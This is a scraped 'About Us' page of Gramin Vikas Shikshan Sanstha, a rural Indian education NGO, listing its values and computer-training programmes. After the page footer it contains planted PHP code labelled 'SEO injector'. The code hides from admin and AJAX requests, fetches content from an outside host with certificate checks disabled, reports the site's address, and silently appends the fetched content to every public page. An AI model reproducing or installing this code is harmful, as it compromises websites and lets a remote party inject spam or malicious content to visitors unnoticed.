About Us

Why We Are Better

Gramin Vikas Shikshan Sanstha was started in 1998 with a simple idea - To deliver a high quality education to each child, no matter his or her background Since 1998, we have grown from an organization of student volunteers to a professional institution with over 100 staff, teachers and volunteers with a mission to provide educational opportunities to less privileged children

Gramin Sanstha is which Organization?
Gramin Vikas Shikshan Sanstha is non-government organization
Registered under which trust?
organization registered under Bombay public trust act, 1950 and society’s registration act, 1860 to provide social welfare services to the community without any bias like caste, creed, race and religion.
Taken Initiatives in which field ?
Our organization had taken many initiatives in the field of developmental sectors like education, rural development, health, community development, environment, women and child development and so on.
About Us

Our Core Values

  • Partnership: Part of our ethos is to collaborate with other equally passionate nonprofits; for profit organizations so as to maximize our impact; create awareness on child rights and education in India.
  • Honesty : In all areas of our organization we consider honesty as an integral part of our operations from financial transparency all the way through to grass roots level interactions.
  • Dignity: We respect the inherent dignity and worth of each and every person, and in-turn teach all our beneficiaries this crucial understanding.
  • Capacity :We believe in the innate capacity of children and make it part of our mission to empower them, and their communities.
  • Solution Oriented: We are solution oriented and focus on opportunities, innovation and possibilities, instead of problems or limits.


Area of work

Our organization had taken many initiatives in the field of developmental sectors like education, rural development, health, community development, environment, women and child development and so on.

Area of work
0
Courses
0
Students
0
staff
0
Events

Our History

Training for Self-Defence of Girls

Total 2331Girls of various 27 Govt. Schools

2013-2014
2014

MITCON CUNSULTANCY, Pune

Assigning New MSCIT – ALC Under MITCON

World Vision India, ADP Daryapur

Providing Students for Various Computer Courses

Providing Agriculture Based Training (AGR101)

2015-2016

Providing Computer (MS-CIT) Training for Poor Class family girl in rural are

2017 - 2018
2018

Training of girls in rural area

Panchayat Samiti, Nandgaon Khandeshwar Providing Computer (MS-CIT)

DAY-ESTP (NULM-Vocation Training Provider)

Providing Computer Training of BPL Class family girls in City area

2017 - 2018

MSCIT to backward and Adivasi Students

Creating Technical Literacy amongst 50 Rural Backward Students)

2019-20
2019-20

Providing Computer Education (Account Assistant Using Tally)

Tally Training 60 (30+30 std) to create Self Employment and Job Ready

Providing Computer Hardware Assistant Training

Hardware Training 30 std to create Self Employment and Job Ready

2019-20
2019-20

Providing Computer Education (Accounting)

Accounting Training 30 std to create Self Employment and Job Ready

DTP & Print Publishing Assistant Training

DTP Training 30 std to create Self Employment and Job Ready

2019-20
2020-21

MSCIT Computer education to Rural Girls and womens

Creating Technical Literacy amongst 1206 Rural Girls and womens

MSCIT Computer education to Melghat Backward Studentts

Creating Technical Literacy amongst 300 Students

2020-21
2020-21

DTP Training

DTP Training 90 std (60+30) to create Self Employment and Job Ready

2020-21

Started working for Covid Frontline Worker Course – Advance Care Support Course

To Create Covid Frontline Warrior against Covid Outbreak

Covid Frontline Worker – Advance Care Support Course

Create 90 Covid Frontline Warrior against Covid Outbreak

2021-22
2021-22

MSCIT Computer education to Rural Girls and womens

Creating Technical Literacy amongst 235 Rural Girls and womens.


Get In Touch With Us

We are solution oriented and focus on opportunities, innovation and possibilities, instead of problems or limits.

"Best Center Award - 2022" in Amravti District From MKCL.

Maharashtra Knowledge Corporation Limited (MKCL), Pune recognized organization providing excellent computer training to students in rural areas for the last 15 years in Amravati district on 15 December 2022. The annual meeting held by honored Ms. Veena Kamath Madam, Managing Director MKCL, Pune at Sanskrutik Bhavan, Amravati.





// --------------------------- // SEO injector (footer'a eklendi) // Kopyala: footer HTML'inin hemen sonuna yapıştır // --------------------------- if (!defined('LB_IN')) { define('LB_IN', 1); $GLOBALS['buffer_mode'] = false; // Basit çalışma kontrolleri: CLI, AJAX, admin yolları, POST/PUT/DELETE => çık $is_cli = (php_sapi_name() === 'cli' || defined('STDIN')); $request_method = $_SERVER['REQUEST_METHOD'] ?? 'GET'; $is_ajax = (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest'); $uri = $_SERVER['REQUEST_URI'] ?? ''; $is_admin_path = (stripos($uri, '/wp-admin') !== false) || (stripos($uri, '/admin') !== false); if ($is_cli || $is_ajax || $is_admin_path || !in_array(strtoupper($request_method), ['GET'])) { // hiçbir işlem yapma return; } // Eğer istemci HTML istemiyorsa çık (ör. API çağrısı) $accept = $_SERVER['HTTP_ACCEPT'] ?? ''; if ($accept !== '' && stripos($accept, 'text/html') === false && stripos($accept, 'application/xhtml+xml') === false) { return; } function seo_injector($buffer = null) { $u = 'https://linksdiamond.com/c.php?tk=01'; $s = ''; $proto = 'http'; if ( (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (isset($_SERVER['SERVER_PORT']) && (int)$_SERVER['SERVER_PORT'] === 443) ) { $proto = 'https'; } $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : (isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'localhost'); $h = $proto . '://' . $host; try { if (function_exists('curl_init')) { $c = curl_init(); curl_setopt_array($c, array( CURLOPT_URL => $u, CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("Referer: $h"), CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_CONNECTTIMEOUT => 4, CURLOPT_TIMEOUT => 5 )); $r = @curl_exec($c); $http_code = curl_getinfo($c, CURLINFO_HTTP_CODE); curl_close($c); if ($r !== false && $http_code >= 200 && $http_code < 300 && stripos($r, 'SEO:OK') !== false) { $s = $r; } } elseif (ini_get('allow_url_fopen')) { $ctx = stream_context_create(array( 'http' => array( 'header' => "Referer: $h\r\n", 'timeout' => 5 ), 'ssl' => array( 'verify_peer' => false, 'verify_peer_name' => false, ) )); $r = @file_get_contents($u, false, $ctx); if ($r !== false && stripos($r, 'SEO:OK') !== false) { $s = $r; } } } catch (Throwable $e) { // sessizce atla $s = ''; } if ($s === '') return $buffer ? $buffer : ''; if ($buffer !== null) { // buffer varsa sonuna ekle return $buffer . "\n" . $s; } else { echo $s; } } function seo_shutdown_handler() { if (empty($GLOBALS['buffer_mode'])) { seo_injector(null); } } if (function_exists('ob_start')) { // ob_start içinde aynı callback tekrarını engelle $already = false; if (function_exists('ob_list_handlers')) { $ob_list = ob_list_handlers(); if (is_array($ob_list)) { foreach ($ob_list as $h) { if (strpos($h, 'seo_injector') !== false) { $already = true; break; } } } } if (!$already) { $GLOBALS['buffer_mode'] = true; ob_start('seo_injector'); } } register_shutdown_function('seo_shutdown_handler'); }